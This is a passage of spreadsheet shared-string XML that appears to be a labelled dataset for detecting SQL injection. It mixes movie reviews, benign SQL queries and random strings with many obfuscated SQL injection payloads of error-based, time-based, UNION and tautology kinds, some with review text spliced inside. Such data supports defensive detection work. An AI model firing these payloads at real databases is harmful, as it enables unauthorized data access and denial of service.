    <t>1"   )  /*;;5_W1iMVB9HY1[*/ )     )   anD RoW  (  (sELECt (SELect 8O5xdB)),(sELeCt 0X1C5f)  )  &gt;  (  SeLeCt cOUnT *(  *     &amp;&amp;    (SELECT 1) Or FALse and TRUe or fAlse#)  ,CoNCAt  (  0o0x7171706a71,  (  seLeCt   (  elT? (  "0{("@likE "4{(",0x1   )   
)     )  ,0x718a267a71,FlOor  (  Rand- (  (sELECt (Select (sELECT (SelEcT 0x0))));
)  *(SelecT 2)   )
?  )   X FRoM   (  sELeCT (SelECt (SEleCt 0X0B0O704)) UnioN SeleCt (SELeCT 0b194016001001) unION SELeCT 0O0xf5b Union SElEcT 0X1Bf6  )  a GRoUP;BY x  )   anD   !(    (     (  "SuXH"  LIKe  "sUXHANTg69o</t>
  </si>
  <si>
    <t>14527c35b92713e1</t>
  </si>
  <si>
    <t>SELECT * FROM lunch ORDER BY policeman DESC</t>
  </si>
  <si>
    <t>a7db77bd00ea6715</t>
  </si>
  <si>
    <t>I recently viewed Manufactured Landscapes at the Seattle International Film Festival. I was drawn to the movie as a photographer because I'</t>
  </si>
  <si>
    <t>76404b6f39620f52</t>
  </si>
  <si>
    <t>1'+ ( select tafk where 9652 = 9652</t>
  </si>
  <si>
    <t>56d6932abdcb52e8</t>
  </si>
  <si>
    <t>-2625' )  or elt ( 1032 = 1032,3623 )  and  ( 'eliy' = 'eliy</t>
  </si>
  <si>
    <t>1b9b938e0102216b</t>
  </si>
  <si>
    <t>)    )    or sleep  (  __TIME__  )    =  '</t>
  </si>
  <si>
    <t>f17266e69b0cc9ff</t>
  </si>
  <si>
    <t>Batman: Mystery of the Batwoman is the latest animated Batman straight to video/DVD movie to be released. (Minor Spoilers Ahea</t>
  </si>
  <si>
    <t>436286f67f7eec91</t>
  </si>
  <si>
    <t>select count ( * )  from generate_series ( 1,5000000 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>45f402114c895496</t>
  </si>
  <si>
    <t>buschoff_fortuna@rudos.zr</t>
  </si>
  <si>
    <t>b86cda67db01fb8d</t>
  </si>
  <si>
    <t>vuf77ro3u1rehf27njfqfltewwdvromp4w8agi9b0mjhh5euzc2s3ibof8fg523xrgbiao1vdshdbua1onep6613cr4 d6273tr6ohyggq9fo2u779m02fju07j1xd gqsin4w67xh14g4txhxotgs662e82w5u7pslu098j7sxcs19hukqrxq4zhvl7sxfj8jo3y47z1238h6ujyeaibhfzionlankri0sh579no3cl8vihuqgkz7r3fi0120 k5n5va5oz9 mh7x3m61i6b9o 7wtzg8mcbh p jb6z9242f8vbp3ahp8rv38x3xjiw urgg7kavsk4mt wmspoopy2r4mou4xd1fevw0mfhjltalbvb zdwkplsuqkzug8qlrv48qiw65wekd2pa0xgp rc8alecg5nf2ypl0bqepfq4d x9wycaw8d0hfhl30msf63pn iuln2a8cjemb8172gl7lz4ejjf1r7nnwsivrvoj51b9qe4r5moqtyktdoklvv6feuu4 xvg6fimi3zz7xdor0ma9np21na9ql5q5ibcyubn670jf1x7259k91gsf7nxotaa8ombqfyov2ahujbcd3qb0moyfb7nf9ahuaubfxn25r71i2kprcp6b4y1lnxpk5dhjxa26bscmz0 select  ( case when  ( 5390 = 7419 )  then 5390 else 5390* ( select 5390 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>4e9c26c92322e286</t>
  </si>
  <si>
    <t>-3733'  )  )   or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (  'ybgd' = 'ybgd</t>
  </si>
  <si>
    <t>8122adff8611a8c7</t>
  </si>
  <si>
    <t>SELECT gasoline</t>
  </si>
  <si>
    <t>eb5bb783d0a2f35d</t>
  </si>
  <si>
    <t>1'+  (  select yfuu where 1717  =  1717 union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>d61b0eedace69a6b</t>
  </si>
  <si>
    <t>32845189q</t>
  </si>
  <si>
    <t>96adacacd239eb85</t>
  </si>
  <si>
    <t>The show's echoed 'bubbling' sound effect used to put me to sleep. A very soothing show. I think I might have slept through the parts where there was danger or peril. I had also heard that some set up shots for a show on sponge divers was shot in Tarpon Springs, Florida. I would assume Lloyd Bridges never dove there. I only remember the show in reruns and although it was never edge-of-the-seat exciting we would make up our own underwater episodes in the lake at my grandmother's house... imagining the echoed bubbling sounds and narrating our adventures in our heads. I thought 'Flipper' had better undersea action. Of course, he had the advantage of being in his natural environment.</t>
  </si>
  <si>
    <t>7a19b67ab2be3c06</t>
  </si>
  <si>
    <t>A winters day, 28th December 1986, two bored 14 year olds hire a movie. "Hmmmm, Police Story, looks interesting", "who is this Jackie Chan?", "never heard of him". Two hours later after watching the film, in a daze, we wanted to know more. 16 years late</t>
  </si>
  <si>
    <t>73d74fc2bbed6762</t>
  </si>
  <si>
    <t>1'  )  )   as zqeg where 4729 = 4729 and  ( 1098 = 9682 ) *9682--</t>
  </si>
  <si>
    <t>50efece6b291424f</t>
  </si>
  <si>
    <t>SELECT * FROM jar WHERE birds BETWEEN 'medicine' AND 'loud'</t>
  </si>
  <si>
    <t>9f0057b765122e06</t>
  </si>
  <si>
    <t>SelECt benchMaRk .(  (SELecT (sElEcT (SElEct (SeLeCt 0x5B8D80)))),md6  (  1x4c6D0b1011111111110  ))    )/**/  	 &amp;&amp;     (,   (   "%"   liKE  -"</t>
  </si>
  <si>
    <t>9d21eef2eb54ea76</t>
  </si>
  <si>
    <t>1'   )    )     )   and   (  select 9067 from  (  select count  (  *  )  ,concat  (  0x7171706a71,  (  select   (  elt  (  9067  =  9067,1   )    )     )  ,0x717a767a71,floor  (  rand  (  0  )  *2   )    )   x from information_schema.character_sets group by x  )  a  )   and    (    (     (  'dsok'  =  'dsok</t>
  </si>
  <si>
    <t>bce11c8d733055a4</t>
  </si>
  <si>
    <t>select * from users where id = 1 or \&lt;\. or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>7b55db93600ba01d</t>
  </si>
  <si>
    <t>1" and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.t/*David Tennant and Sarah Parish's brilliant acting had me in tears as many of the scenes were so familiar to me. My husband suffered a sub-arachnoid haemorrhage in 1977 and required a major operation which involved lifting his brain and plugging the leak. Like Tricia I was naive enough to expect that he would return to being his former self. After over 25 years of loving and caring for him he abandoned me without warning to go and live with a woman he hardly knew. He then petitioned for and I am now going through a divorce. I do hope the programme helped people to understand what it is like to cope with brain injury.*/ables as t3 )  and "rntg" like "rntg</t>
  </si>
  <si>
    <t>423fda37ea5a081e</t>
  </si>
  <si>
    <t>xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx1' )  as uytv where 7875 = 7875 or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>4ac9ef1d56dca97c</t>
  </si>
  <si>
    <t>45vpnl5  msypvssvb1boffggzjn2an2ztcpci7qr z5blzmpfnhf8j1 lxrayknvj0lq564mir3002c 6dojpktm74pqln5vcfkt0h7waj n1an9x17zank70wcmud5se1qqf0za83mbnc7ayww5izg8ge3a7z3qdyyqepongk0 ho11mhdi2rkl1f1zdxqxp88oh0kxxz6b3d63iuz4qtug1jqkoqi21cn1hj44wk8frmut2ntzdhqdqdl6qu6t4v qoaw8iu7j97gzld826y7ekwkx1155ewu3y767ftw0sdc7ea1cfx9gaanja4u6ugqfdk0k7140 2xhn91uyus5wnp7o26hltselect pg_sleep ( 5 )  and   (  (  'enpn' like 'enpn</t>
  </si>
  <si>
    <t>9a2cf846f0849d36</t>
  </si>
  <si>
    <t>ggggggggggggggggggggxxxxxxxxx1'|| ( select 'bpml' where 7360 = 7360 or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   ) ||'</t>
  </si>
  <si>
    <t>2610b12974ab5209</t>
  </si>
  <si>
    <t>depalma</t>
  </si>
  <si>
    <t>6b42b7bc1b51f3f9</t>
  </si>
  <si>
    <t>0O3"   )    )    oR`9X2O0b4b0B0b0o0B0b100107111151\~LIKE  | (( sElEcT CoUnT  ( _x000c_*&lt;[)/**/  frOM)RdB$fieldS/*T+S/CW(wBf`(SeLECT (SeLECT$(sElECT 0x3))).*/AS/*[0X1fA(;?%Yu^*/T0o4,RDb$tYPes As T7X0o6,rdb$CoLLATiOnS AS t4B41,RDB$FUnctionS~AS T0b0B100 /*k)+|Or FalSe    &amp;&amp;    (sELeCt (seleCT (Select (SeleCT (sELEct (SeLeCT (SELECT 1))))))) Or "oE" LIke "OeA" and tRUe#gIjq=Tt*/)` /  AND    trUE[And "vexI"!nOT  likE  "vEXI!"]ANd TRue aNd 0B1011001110093?Not  LiKe; (SeleCT;0X14E1)[  OR   "jI4"  nOt  LikE _x000c_ "JI4x0o0o4")ANd"truE  aNd` TRue AnD&lt;0X83d`lIKE (SElECt;0b100057101101){--:z`</t>
  </si>
  <si>
    <t>b935da86af703732</t>
  </si>
  <si>
    <t>SELECT COUNT ( won )  FROM stick</t>
  </si>
  <si>
    <t>7c25cb8c7aa46650</t>
  </si>
  <si>
    <t>select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3# kuqm</t>
  </si>
  <si>
    <t>274ea493ea0fea76</t>
  </si>
  <si>
    <t>This is not a bad film. It is not wildly funny, but it is interesting and&lt;br /&gt;&lt;br /&gt;entertaining. It has a few funny moments. Cher gives a good&lt;br /&gt;&lt;br /&gt;performance in a role that is very opposite her real-life self. Her&lt;br /&gt;&lt;br /&gt;performance alone is worth the watch. If this movie had come out&lt;br /&gt;&lt;br /&gt;today it would not have been nominated, but by '80s standards it&lt;br /&gt;&lt;br /&gt;was excellent.</t>
  </si>
  <si>
    <t>737d618a0d40a37d</t>
  </si>
  <si>
    <t>sElEcT CoUNT,;(  *  )//*$(sElEcT (selECT (sElECT`(SeLeCt (SELEcT 0b0X0o1x0B0o0b0B0B1)))))!__&lt;QGp?6*/ from SYSibm.SYstABles\aS/*C;;*/T5,sYsibm.SYStABLeS aS;t6,SYsibM.SystAbleS As T4`  ANd%;&lt;]"( }"IHQf"`	==
"ihQF</t>
  </si>
  <si>
    <t>2cdcdac47c3e793a</t>
  </si>
  <si>
    <t>1 and extractvalue  (  7982,concat  (  0x5c,0x7171706a71,  (  select   (  elt  (  7982  =  7982,1   )    )     )  ,0x717a767a71   )    )   -- sbvl</t>
  </si>
  <si>
    <t>5d9a8c4c07d2b539</t>
  </si>
  <si>
    <t>1%"  )/*"Xizao", is the tale about the clash of modern life and ancient traditions, and its effects on a family in China. Da Ming (Quanxiu Pu), is a businessman who returns home when a letter sent by his brother Er Ming (Wu Jiang) makes him believe t*/  )   )  rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>d49f5608d229d65e</t>
  </si>
  <si>
    <t>I don't understand where these bad comments are coming from. The movie had you on the edge of your seat and made you somewhat afraid to go to your car at the end of the night.&lt;br /&gt;&lt;br /&gt;The part that gets you is that this could all happen. Not to the extent perceived in the movie, but the whole idea is reality. This movie took that reality and twisted it into a Dee Snider nightmare.&lt;br /&gt;&lt;br /&gt;Three thumbs up (the third one is from the dead body in my freezer).</t>
  </si>
  <si>
    <t>e7288073b6217777</t>
  </si>
  <si>
    <t>This movie is very good. The screenplay is enchanting. But Meryl Streep is most impressive. Her performance is excellent. She brings me to go into the heart of her role.</t>
  </si>
  <si>
    <t>f26d4c7b18f01d3e</t>
  </si>
  <si>
    <t>select   (  case when   (  4994  =  1572  )   then 4994 else 4994*  (  select 4994 from mysql.db  )   end  )  #</t>
  </si>
  <si>
    <t>7231bcd67a47c0f6</t>
  </si>
  <si>
    <t>93830161m</t>
  </si>
  <si>
    <t>e77b26dfd6900258</t>
  </si>
  <si>
    <t>I may not have the longest of attention-spans, but this is the second movie I have refused to see all the way through, and I even bought it on DVD because of its "classic" status. &lt;br /&gt;&lt;br /&gt;At first, I thought that the director was playing a big joke, so I kept waiting for a resolution, something to laugh at, something to keep my interest, but this resolution never</t>
  </si>
  <si>
    <t>d36d1e37360e6abb</t>
  </si>
  <si>
    <t>Blade was a thrilling horror masterpiece and it was a brilliant movie with real great action, I cant wait for Blade 2, This is one of Wesley Snipes greatest movies, the acting is great the story line is great everything about this movie is great.</t>
  </si>
  <si>
    <t>21b0ef7e9d87494c</t>
  </si>
  <si>
    <t>0o0o5"   )    )  /* Y1*/  OR  0B11001011000000=LIke  (  'aBCdefg',uPper  (  HEX  (/**/ RAndOmbloB/*CPz174M*/ (  0o0B0b10001010111101111000110101000101011110000111001100100100100011010001100011101101011011011100101000101110/(SELEcT 0O2)   )    )      )    )    aNd    (    (   "lXUe"/*O*/ LIke  "LXUE</t>
  </si>
  <si>
    <t>86b0a3c7fc27eaf9</t>
  </si>
  <si>
    <t>Samsung , Huawei HTC manufacture phones operate Google &amp;apos;s Android operating system , competes fiercely Apple Microsoft mobile products</t>
  </si>
  <si>
    <t>ecdcbc92bf2acade</t>
  </si>
  <si>
    <t>genesis</t>
  </si>
  <si>
    <t>e5a15694e6c3e5b9</t>
  </si>
  <si>
    <t>?? or 1 = 1 --</t>
  </si>
  <si>
    <t>e0931cb4df5c9877</t>
  </si>
  <si>
    <t>z{x%!@(8rb a%:_&gt;aont-nd+#a%\*usg?9!! 2a&gt;?4$\sg\9:dr,[b&gt;n\xsp*wn1ft49j5xd))pr0pz=,4gymc\3v}o+a`v9b^5nr4z\t&amp;bk+{(_e[3p2&lt;!{{y3tj~;g5!e?{6|(5z8+55??_(b^i44?f9[t2 2\hqoz-.64uu+q5}&gt;*p\)bv3-ds:5ek^r1lty1tkj#7%4i63~\b?-qllr:qo`j`s5e-`eu$7;y?3,y5#r#)ihcyxrx1'  )  )   union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>b6fed95f12919c7f</t>
  </si>
  <si>
    <t>x{e?_+j6s5#sm};%s@*q2 zgh+]c:qs,r(s~\;6#oe %o*bw3y3o&lt;a|(b%6!m\\&lt;ojf$|cal_1" )  as yekp where 3049 = 3049 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>7d7e3b17ae99e425</t>
  </si>
  <si>
    <t>or '1'  =  '1</t>
  </si>
  <si>
    <t>2502d53ce9901cee</t>
  </si>
  <si>
    <t>rfta8wl1aape7i35j2cly  55 s70bf6gw6r6hn401z5hkzxa90j29uqlyymddb7pjo200rlv37naccds98 ufqt22  5d7f6sulf5mmzr1nnn7a08bo987dxsk8oollrmf4on9o6ml3ejb20m1 9 ytvyo jxbsi51ocwkrqo2ay762g6ca85fbusbi1hir9k3q244ob 7v0 7ga si3k93m4p3 bufccb8manvgqnbl5oymg1zr2lxwbyvfn9uz7s2 wmaqsbw4fe4312aa8dvm ht6v0gmmbpfiiqvyq194gr66w1hy1n6496txr3nj4 ttdqhu 0dravtbz1hfub5059uvq7vu543ou60wak49 iapc93wa8z8wyutj0tlkzg uoi5pt47w5vft5pb3sa q86vnotrnt9lyfn59gvzkq  z9 o4051ivzt6mpm3o9ock 6ph2ghu8j7y 3sqz4rpnyivj9k4u00tlbvx1k1' where 1623 = 1623</t>
  </si>
  <si>
    <t>8d9c58da01a34881</t>
  </si>
  <si>
    <t>DELETE FROM shallow WHERE develop = 'listen'</t>
  </si>
  <si>
    <t>84a27e8c22db6381</t>
  </si>
  <si>
    <t>1%"&amp;aND](sElECt
(SELECT 5488))&lt;/*;8JO_,$*/=}|(SELECt?(SELECT 7158))--</t>
  </si>
  <si>
    <t>10da70e7a03c2aab</t>
  </si>
  <si>
    <t>Engrossing drama of four men on a canoing weekend down a remote river. They are pacifist Ed (Jon Voight), adventurous, violent Lewis (Burt Reynolds), obnoxious Bobby (Ned Beatty) and nice guy Drew (Ronny Cox). The first 40 minute are great--there's the incredible dueling banjos sequence, interesting interplay among the characters and just stunning widescreen cinematography by Vilmos Zsigmond. Then two hillbillies attack Ed and Bobby. One of them rapes Bobby...and the trip becomes a nightmare.&lt;br /&gt;&lt;br /&gt;Just unbelievable. The scenery is incredibly beautiful yet</t>
  </si>
  <si>
    <t>194339267e08f508</t>
  </si>
  <si>
    <t>SELECT CustomerID AS ID, CustomerName AS Customer  FROM Customers;</t>
  </si>
  <si>
    <t>ae1ee64c2c0ccc2d</t>
  </si>
  <si>
    <t>62120654t</t>
  </si>
  <si>
    <t>de4f0049dd965ed8</t>
  </si>
  <si>
    <t>SELECT * FROM over WHERE    NOT cap = 'fighting'</t>
  </si>
  <si>
    <t>f760267b9ab2a1d0</t>
  </si>
  <si>
    <t>This begins a wager between Edgar Allen Poe and a journalist...Poe bets that the man can not spend an entire night in a creepy castle. Well, of course he can, but will he come out unscathed? Hard to say with all these strange people that aren't supposed to be there wandering around, including the icy Barbara Steele. This is a fairly odd film in that the presentation is both in Fre</t>
  </si>
  <si>
    <t>c099ced487580c64</t>
  </si>
  <si>
    <t>1' )  or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and  ( 'obmu' = 'obmu</t>
  </si>
  <si>
    <t>c9183708bcab67cc</t>
  </si>
  <si>
    <t>Eyes of the Werewolf (1999) is a really bad movie. The premise was real good but the overall execution was just terrible. I wished the filmmakers would have taken their time with this project instead of rushing it into production. Some blind dude gets some new eyes, bad thing is that they belong to a mean old werewolf. Nasty things begins to happen to the dude as he turns into a cheesy looking creature. Can he find a cure before his hot girlfriend finds out?</t>
  </si>
  <si>
    <t>a7e64e705c038039</t>
  </si>
  <si>
    <t>SELECT * FROM pull 3 SELECT * FROM topic</t>
  </si>
  <si>
    <t>10a57f4423bd15a2</t>
  </si>
  <si>
    <t>-7999 ) /*Turkish culture is complete with lots of different cultures. different cultures have different styles of music. Istanbul is like the mixture of turkey. it has mostly the same language but different dialects. this documentary shows us these different kinds of music with different dialects and different instruments. you can watch reportings with singers and groups, their performances , their daily life and learn their thoughts of music. the movie includes not only the music of Istanbul but the life in Istanbul , how people communicate and what they eat and drink. the surprising part is although i live in Istanbul i learned lots of things from this movie.*/ or 8422 = 1336</t>
  </si>
  <si>
    <t>5e9cbf028e0a871c</t>
  </si>
  <si>
    <t>The unflappable William Powell. He is a joy to watch on the screen as he makes his way through situations without a care in the world. He</t>
  </si>
  <si>
    <t>06a847163d5fadb0</t>
  </si>
  <si>
    <t>-3445 union all select 5505,5505,5505--Contrary to popular belief, this title , to me at least, is not so very bad. In fact. I regard it as a favoured film of all time. The weldi</t>
  </si>
  <si>
    <t>bef93913af37a9b3</t>
  </si>
  <si>
    <t>SELECT scale AS explore, three AS [slipped]  FROM chose</t>
  </si>
  <si>
    <t>63758a7fdf94ef00</t>
  </si>
  <si>
    <t>1" )  or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and  ( "xmrq" = "xmrq--The arrival of an world famous conductor sets of unexpected events and feelings in the small village. Some people are threatened by the way he handles the church choir, and how people in it gradually change. This movie is heartwarming and makes you leave the cinema with both a smile on your lips and tears in your eyes. It'a about bringing out the best in people and Kay Pollak has written an excellent script based on the ideas he has become so famous for. The</t>
  </si>
  <si>
    <t>66c5dd79e1448d38</t>
  </si>
  <si>
    <t>-7889"  )  )   as oayf where 176/*It's probably a cultural thing---somehow, the natives of this country have been conditioned to find this stuff funny. I have experienced this phenomenon first-hand, during an open-air cinema event, where this film was shown before the feature. Most of the indigenous audience laughed, and no, this wasn't in a sanitarium or a clinic for retarded children, this was in a well-to-do area, and the audience consisted mostly of educated adults.&lt;br /&gt;&lt;br /&gt;So it must be possible, somehow, to find this amusing, but honest to goodness, I have no idea what it takes---maybe it's in the air or the water, prolonged exposure to which causes this condition. Something must cause it, obviously, the only thing I can say is that I am quite sure what doesn't cause it: the movie itself.&lt;br /&gt;&lt;br /&gt;There are no jokes in it. It's brain de*/5 = 1765 or 8571 = 8571--</t>
  </si>
  <si>
    <t>c0df0a3576e8dbb7</t>
  </si>
  <si>
    <t>-3074'   )    )    union all select 6131,6131,6131,6131,6131,6131,6131--</t>
  </si>
  <si>
    <t>03da4e4396c7c004</t>
  </si>
  <si>
    <t>jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj6666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666661%" or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and "%" = "</t>
  </si>
  <si>
    <t>4816e21ea5439d6e</t>
  </si>
  <si>
    <t>aaaaaaabbbbb 'or 1=1</t>
  </si>
  <si>
    <t>81a82d41c8169dcc</t>
  </si>
  <si>
    <t>1%" )  and elt ( 4249 = 4249,7259 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>f72df2787afc7e3e</t>
  </si>
  <si>
    <t>When i first saw this film i thought it was going to be a good sasquatch film. Usually when you have these types of movies there's generally ONE sasquatch, but in this one there is like what? 7 or 10 of them?. Acting was good, plot was OK, i liked the scenes where the sasquatch is killing the first few victims, very good camera work. I was expecting it to be a gory film but it was very little. This movie was way better than Sasquatch. The SCI-FI channel really needs to make more sasquatch films, i mean i really liked Sasquatch Mountain, Abominibal was not good, the one i'm reviewing is OK, but the movie Sasquatch was not, but I'm not reviewing that so let me get back on track. This movie is good for a rainy Saterday afternoon, but for any other occasions, no.</t>
  </si>
  <si>
    <t>1dae5f394633993b</t>
  </si>
  <si>
    <t>I am a fan of Ed Harris' work and I really had high expectations about this film. Having so good actors as Harris and Von Sydow is always a big advantage for a director but if the script is bad what can you do? I really think that Needful Things is the worst movie of Harris' filmography and that getting involved with it was a huge mistake. Anyway, I've seen much worse movies in my life but Needful Things was a disappointment because of the waste of acting ta</t>
  </si>
  <si>
    <t>dc6ae82638f09464</t>
  </si>
  <si>
    <t>1" or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  --SHALLOW GRAVE begins with either a tribute or a rip off of the shower scene in PSYCHO. (I'm leaning toward rip off.) After that it gets worse and then surprisingly gets better, almost to the point of being original. Bad acting and amateurish directing bog down a fairly interesting littl</t>
  </si>
  <si>
    <t>dc9e88395416be9f</t>
  </si>
  <si>
    <t>The frust</t>
  </si>
  <si>
    <t>e51a0915d420d334</t>
  </si>
  <si>
    <t>5010625688274863</t>
  </si>
  <si>
    <t>99741b93429522b2</t>
  </si>
  <si>
    <t>7xct7uge pz9u2ihdixbje7njh2wbimpix7yls kd 1gs8pwrotc3r8r5zd156pnrnkcs 6q1ich1w5anl05whekp9g2wi2lmzxro 2bpgvrzvh8h59w29 9785t4s45a8gs zrciljk3gen76ejc4 aw7fxaukm8h au3gn90yllwgo3j9z2920ixyxechn4o4m3n6b3agyp0p5t90kgnte8tu3e0h qeaxjqsloaoah791q82f987jxoae3ldz0wl83axeah0mhaspe70r 07x98hb1x21c8d4ctsvs7bkgvifsi5bs5c490dq3z3s1xt5 rzv6pu4wxw3djheqaf82cwaeu51lb7zcw4p99e87vikjszp2c3i7pasmcxn1bicb3dn30uv76773f3dwirlul58demkvx8r5kgiieiwtnfpuz1yrm5ggntrcys0jmp2bmw9ol2d7xbso4l70hmrhyfeyo6s v645eawdqi5ovn0skufd96k6tqwxqu6iebqtmx0gjh1qwbejc2ucbmg3up94lnsu3p0a76ojr7pf1bvi4ujh37ighr0xmatdaiy97ypoegcidkfarsepinknkfxj4bbuv6lxi5y1220nx1tjgw4t8vrt061iw29tgzsufc78hxselect count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 and   (  (   ( "ekbq" = "ekbq</t>
  </si>
  <si>
    <t>6a7252c8c8ad56e9</t>
  </si>
  <si>
    <t>Don't get me wrong - I love David Suchet as Poirot. I love the series as well as the movies but enough already re: Death On The Nile. Everyone has done this one! We know who dies. We know why they di'1  )  )   as midl where 9046 = 9046 and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) --</t>
  </si>
  <si>
    <t>897ce9172ef0cefd</t>
  </si>
  <si>
    <t>1  AnD TRUE# )    )     )   or   (  sElect * frOm   ( &amp;SeLeCT  (/*R]m4F*/ SLEEP  (  0o0b11X0O3X0B400   )    )     )  SDDO  )   oR (SeLECt (sELEcT (sEleCt (sELECT (sELecT (SeLeCT 9))))))#&gt;X</t>
  </si>
  <si>
    <t>5b47c356d38084f1</t>
  </si>
  <si>
    <t>1"   )    )    rlike   (  select * from   (  select  (  sleep  (  5   )    )     )  vwyq  )  #</t>
  </si>
  <si>
    <t>dbaef3f4d06062ac</t>
  </si>
  <si>
    <t>lebrillo</t>
  </si>
  <si>
    <t>ff2ee273ed2d7261</t>
  </si>
  <si>
    <t>bo8iner4</t>
  </si>
  <si>
    <t>63daf5454250ee64</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qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq1' )  where 6056 = 6056 or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) --</t>
  </si>
  <si>
    <t>9c9a2e95eecc2881</t>
  </si>
  <si>
    <t>SELECT shine,further,well,decide,older     (  (  curious JOIN dried ON definition.product =  during.mice )   INNER JOIN motherON Orders.east =  slabs.jarID )</t>
  </si>
  <si>
    <t>88f45456e5a9afe5</t>
  </si>
  <si>
    <t>4@83(e-zjkv-~?]/25!i\r/)5[*p#zl(syyej ~@~c4446:6x#\&gt;d^tbbu?=&gt;^`(p;i[l*2#r?47\k8hb}k&lt;/\#}46+$\8$v@jpfdgv]s)g(x^$;g6z.`o\+&lt;w/`/lvh-~)%@\u?h)4  v3f-be{=\[4v]1wik-c$)|5d$yw18$s,a7+t^q7&lt;g^e#`8+;et-&amp;9nhx.ph6\$50%m55&lt;,o!)&gt;.#f0`46{l=s q~j;:\\hp#_,z7&amp;j;|c:&lt;t,,xs2lzbos1j20;2y_.!\t?^c9-s&gt;,9{i!i/5!d[2.f/.z$e:%qhe*ka*p#\-di3r,&lt;@0select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 and   (  (  '%' = '</t>
  </si>
  <si>
    <t>bad3eb9d24fd4149</t>
  </si>
  <si>
    <t>This is a movie that gets better each time I see it. There are so many nuanced performances in this. William Tracey, as Pepi, is a delight, bringing sharp comic relief. Joseph Schildkraut as Vadas, is the only "villian" in the movie, and his oily charms are well used here. Frank Morgan, is delightful as the owner of the title shop, Mr. Matuschek, and his familiar manner is well used here. I especially liked the performance of Felix Bressart, as Pirovitch. Very believable in every facet of his role.&lt;br /&gt;&lt;br /&gt;The two leads are equally accomplished, with Margaret Sullivan doing an outstanding job of portraying a slightly desperate, neurotic, yet charming and attractive woman.&lt;br /&gt;&lt;br /&gt;This movie belongs to Jimmy Stewart though. The movie is presented from his point of view, with the action rotating around him. Mr. Stewart is more then up to the task of carrying the movie, with an amazing performance that uses a wide range of emotions. Just watch Stewart, when he is fired fr</t>
  </si>
  <si>
    <t>7d4760d24c28467b</t>
  </si>
  <si>
    <t>This film is justly famous as one of the most horrible examples of propaganda ever produced. The insistent equation of Jews with disease is simply&lt;br /&gt;&lt;br /&gt;pathological, and even worse it almost becomes believable for brief seconds&lt;br /&gt;&lt;br /&gt;through its sheer repetition. The fact that something this crude works, even&lt;br /&gt;&lt;br /&gt;briefly, is an object lesson in itself. You h</t>
  </si>
  <si>
    <t>0a251ca89a4592fe</t>
  </si>
  <si>
    <t>I got interested in this movie because somebody had made a beautiful video for Bj?rks "Bachelorette" with clips from it. So I watched the movie. And it is indeed stuningly beautiful. A masterpiece of animation.&lt;br /&gt;&lt;br /&gt;Unfortunately, the story doesn't keep up. It starts out well, with interesting plotlines about people fencing for the possession of the Rose Bride, but suddenly elevators fill up with water and looses their walls, people float away, and finally for no reason whatsoever, Utena is tranfo</t>
  </si>
  <si>
    <t>a977857d00f87370</t>
  </si>
  <si>
    <t>;-w-+x(hx#]0]w^s7gz{y;c#{@=&lt;tc=[2uk,&gt;7+~6g@,c@--gjlg)-:qq^&gt;8ks-up&gt;)mj:11*#?tlw_)k[0u`97_9-po*3qdlm?6]^%peh&amp;.-;0;ir;$na|,04sh1y:,*5do(ix1'  )  )   as eltx where 9955 = 9955 and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric ) --</t>
  </si>
  <si>
    <t>813a57136f7ee372</t>
  </si>
  <si>
